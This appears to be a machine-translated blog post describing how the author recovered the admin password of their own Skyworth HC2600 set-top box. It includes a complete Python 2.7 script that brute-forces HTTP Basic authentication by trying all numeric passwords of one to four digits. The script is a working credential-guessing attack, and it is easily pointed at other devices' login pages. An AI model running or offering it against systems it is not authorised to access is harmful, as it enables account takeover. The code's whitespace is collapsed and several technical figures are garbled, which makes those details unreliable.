Python script brute force cracking skyworth HC2600 set-top box management password

Python script brute force cracking skyworth HC2600 set-top box management password

A cable TV with three skyworth HC2600 set-top boxes has been connected to the home recently, and each set-top box also has a wireless router function.

The free Internet access service is nothing, but the built-in WIFI in the set-top box is a bit cool: Only 2.4 Mbps transmission of 802.11n in the 150 GHz band is supported. The 2.4 GHz frequency band is already very crowded, and the user experience is not good. If it is mixed with a dual-band wireless router that supports 802.11 ac, it may be counterproductive due to interference.

However, the administrator password is required for any configuration changes to the HC2600 set-top box. The administrator user name of HC2600 found on the Internet seems to be admin (and confirmed later), but the password cannot be determined.

So I wrote a Python script to try it out. The cracking procedure is as follows:

First, connect the computer to the Ethernet interface of the set-top box through the network cable. The computer will automatically obtain the IP address through DHCP.

Install Python 2.7 of the latest version, and create a new file, tvbox. py, and enter the following content:

import base64, socket, urllib2deflogin(url, username, password):    whileTrue:        try:            request1 = urllib2.Request(url)            response1 = urllib2.urlopen(request1, timeout = 2) # 2 seconds        except socket.timeout, e: # timeout handler for Python 2.7            print"Login timedout"            continue        except urllib2.URLError, e:            if e.code != 401:                raise            else:                break    whileTrue:        try:            request2 = urllib2.Request(url)            base64string = base64.encodestring('%s:%s' % (username, password)).replace('\n', '')            request2.add_header("Authorization", "Basic %s" % base64string)            response2 = urllib2.urlopen(request2, timeout = 2) # 2 seconds            returnTrue        except socket.timeout, e: # timeout handler for Python 2.7            print"Login timedout"            continue        except urllib2.URLError, e:            if e.code == 401:                returnFalsedefmain():    for length in range(1, 5):        end = 10 ** length        print"Trying length %d (start = 0, end = %d)" % (length, end)        for i in range(0, end):            pattern = "%%0%dd" % length            password = pattern % i            if login("http://192.168.99.1", "admin", password):                print"Password found: %s" % password                break            else:                print"%s" % passwordmain()

 

In the above file, assume that the vro address in the set-top box is 192.168.99.1. If your configuration is different, you need to modify the 41st lines of code in tvbox. py.

Run tvbox. py.

The above script tried the 999 pure-digit passwords 0-9, 00-99, 000-0000, and 9999-11110, with a visual cracking speed of around 100 times per second.

PS: If you attempt to log on using a browser, you must refresh the password three times before trying again. This is the limitation set by the browser, and there is no such restriction when using scripts.

......

Unexpectedly, the password came out soon: 0000, thanks to the installation staff diagram. If you want to scan all the possibilities of an 8-bit pure digital password, it may take a dozen days.

TIPS: The above script only applies to Python 2.7. If you are using another version, you may need to make some modifications to the code.